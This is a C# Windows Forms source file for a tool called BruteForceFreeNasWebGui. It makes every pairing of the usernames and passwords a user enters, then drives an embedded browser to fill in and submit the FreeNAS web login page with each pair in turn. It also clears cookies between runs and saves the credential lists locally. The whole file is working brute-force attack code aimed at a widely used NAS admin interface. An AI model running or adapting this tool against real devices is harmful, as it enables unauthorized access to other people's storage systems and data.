﻿using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Data.OleDb;
using System.Globalization;
using System.IO;
using BruteForceFreeNasWebGui.Properties;


namespace BruteForceFreeNasWebGui
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        // Only tested with FreeNAS 8.0.4 - no other versions tested. 
        // Should be ok though. 

        string _url = "http://{0}/account/login";

        private void Form1_Load(object sender, EventArgs e)
        {
            txtUser.Text = Properties.Settings.Default.Users;
            txtPassword.Text = Properties.Settings.Default.Passwords;
            wbrFreeNas.Navigate(string.Format(_url, txtIpAddress.Text));
        }

        private void Form1_FormClosing(object sender, FormClosingEventArgs e)
        {
            SaveUsersPasswords();
        }

        private void btnBrute_Click(object sender, EventArgs e)
        {
            // Check that the user has entered some user names and passwords.
            if (txtUser.Lines.Length < 1 || txtPassword.Lines.Length < 1)
            {
                MessageBox.Show("You must enter users and passwords. Please read the instructions.", "No Users or Passwords...", MessageBoxButtons.OK, MessageBoxIcon.Error);
                return;
            }
            StartBrute();
        }

        /// <summary>
        /// Get the Cartesian product, set some flags, put the users/passwords in a string[][], then start brute forcing.
        /// </summary>
        private void StartBrute()
        {
            object[][] o = new object[2][];
            _upPairs = new List<string[]>();
            o[0] = txtUser.Lines;
            o[1] = txtPassword.Lines;

            var cartesianProduct = CartesianProduct(o);
            StringBuilder sb = new StringBuilder();

            foreach (var item in cartesianProduct)
            {
                Console.WriteLine(string.Join("\t", item));

                // This is too many steps, but it is explicit for debugging. That's why. 
                object[] tmp = (object[])item;
                string[] tmp2 = { tmp[0].ToString(), tmp[1].ToString() };
                _upPairs.Add(tmp2);
                sb.AppendLine(string.Format("{0}\t{1}", item));
            }
            // I'd rather use an array as it is simpler to use an index
            _strPairs = _upPairs.ToArray();
            // List out all the user/password pairs for the user to read.
            txtPairs.Text = sb.ToString();
            // List how many pairs there are.
            this.Text = "Pairs = " + txtPairs.Lines.Length.ToString();

            // This is a flag that tells us to brute force during the DocumentCompleted event
            _continue = true;
            // Start the brute forcing...
            wbrFreeNas.Document.Forms[0].InvokeMember("submit");
        }

        // This is a flag for the DocumentCompleted event.
        bool _continue = false;
        List<string[]> _upPairs;
        string[][] _strPairs;
        // This is to move to the next user/password pair in the array while brute forcing.
        int _current = 0;

        // This is the same Cartesian product code I used for the Samsung S Voice corpus generator.
        // From: http://www.interact-sw.co.uk/iangblog/2010/08/02/linq-cartesian-4
        /// <summary>
        /// Gets an N-ary Cartesian product. See code above for usage, or consult this URL:
        /// http://www.interact-sw.co.uk/iangblog/2010/08/02/linq-cartesian-4
        /// </summary>
        /// <param name="inputs"></param>
        /// <returns>An N-ary Cartesian product.</returns>
        public static IEnumerable<object[]> CartesianProduct(params object[][] inputs)
        {
            return inputs.Aggregate(
                (IEnumerable<object[]>)new object[][] { new object[0] },
                (soFar, input) =>
                    from prevProductItem in soFar
                    from item in input
                    select prevProductItem.Concat(new object[] { item }).ToArray());
        }

        /// <summary>
        /// Test the flags to see if we should do the brute forcing or not.
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private void wbrFreeNas_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
        {
            // This identifies the login URL, and if we're there, then brute force. 
            if (wbrFreeNas.Url.AbsolutePath.Contains("account/login") && _continue && _current < _strPairs.Length)
            {
                // Do another brute force attempt, and advance the index. 
                bool ok = FillAndSubmit(_strPairs[_current][0], _strPairs[_current][1]);
                if (ok)
                {
                    this.Text = _strPairs[_current][0] + " " + _strPairs[_current][1];
                }
                _current++;
            }
        }

        #region Other webbrowser events - not used.
        private void wbrFreeNas_Navigated(object sender, WebBrowserNavigatedEventArgs e)
        {
            // not used.
        }

        private void wbrFreeNas_Navigating(object sender, WebBrowserNavigatingEventArgs e)
        {
            // not used.
        }

        private void wbrFreeNas_ProgressChanged(object sender, WebBrowserProgressChangedEventArgs e)
        {
            // not used.
        }
        #endregion

        /// <summary>
        /// Fill in the username and password in the form. Submit it. 
        /// </summary>
        /// <param name="user"></param>
        /// <param name="pass"></param>
        /// <returns></returns>
        private bool FillAndSubmit(string user, string pass)
        {
            bool result = false;
            try
            {
                // id_username - These are the HTML IDs, but we'll just get them by name. 
                // id_password
                wbrFreeNas.Document.Forms[0].All.GetElementsByName("username")[0].InnerText = user;
                wbrFreeNas.Document.Forms[0].All.GetElementsByName("password")[0].InnerText = pass;
                wbrFreeNas.Document.Forms[0].InvokeMember("submit");
                result = true;
            }
            catch
            {
            }

            return result;
        }


        private void btnClearCookies_Click(object sender, EventArgs e)
        {
            ClearCookies();
        }

        private void btnClearUserPass_Click(object sender, EventArgs e)
        {
            txtUser.Text = string.Empty;
            txtPassword.Text = string.Empty;
            SaveUsersPasswords();
        }

        private void ClearCookies()
        {
            // Some code from an MSDN forum post to clear cookies.
            // http://social.msdn.microsoft.com/Forums/en-SG/winforms/thread/c2208aeb-965d-4ae4-9964-c579753da2e4
            // This avoids using the MSHTML object.
            wbrFreeNas.Navigate("javascript:void((function(){var a,b,c,e,f;f=0;a=document.cookie.split('; ');"
            + "for(e=0;e<a.length&&a[e];e++){f++;for(b='.'+location.host;b;b=b.replace(/^(?:%5C.|[^%5C.]+)/,''))"
            + "{for(c=location.pathname;c;c=c.replace(/.$/,'')){document.cookie=(a[e]+'; domain='+b+'; path='+c+';"
            + "expires='+new Date((new Date()).getTime()-1e11).toGMTString());}}}})())");
        }

        private void SaveUsersPasswords()
        {
            Properties.Settings.Default.Users = txtUser.Text;
            Properties.Settings.Default.Passwords = txtPassword.Text;
            Properties.Settings.Default.Save();
        }

        private void btnGo_Click(object sender, EventArgs e)
        {
            wbrFreeNas.Navigate(string.Format(_url, txtIpAddress.Text));
        }

    }
}
